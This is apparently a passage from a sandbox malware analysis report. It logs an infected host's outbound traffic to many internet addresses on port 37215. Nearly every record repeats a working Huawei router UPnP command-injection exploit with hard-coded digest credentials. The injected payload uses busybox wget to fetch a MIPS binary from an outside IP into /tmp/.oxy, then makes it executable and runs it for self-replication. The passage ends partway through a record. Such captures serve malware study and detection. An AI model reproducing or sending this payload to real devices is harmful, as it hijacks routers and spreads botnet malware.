3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1199192.168.2.135065824.84.178.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.522743940 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1200192.168.2.1355908157.71.46.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.522783995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1201192.168.2.1358928197.203.218.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.522811890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1202192.168.2.1336954161.5.192.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.522835016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1203192.168.2.1358574197.152.234.23437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.522871017 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1204192.168.2.1334448197.73.111.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.522912979 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1205192.168.2.134182441.20.119.3037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.522933960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1206192.168.2.1345658197.146.127.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.523783922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1207192.168.2.135483841.116.102.21137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.523817062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1208192.168.2.133385041.33.112.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.523844957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1209192.168.2.1344508157.149.7.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.523901939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
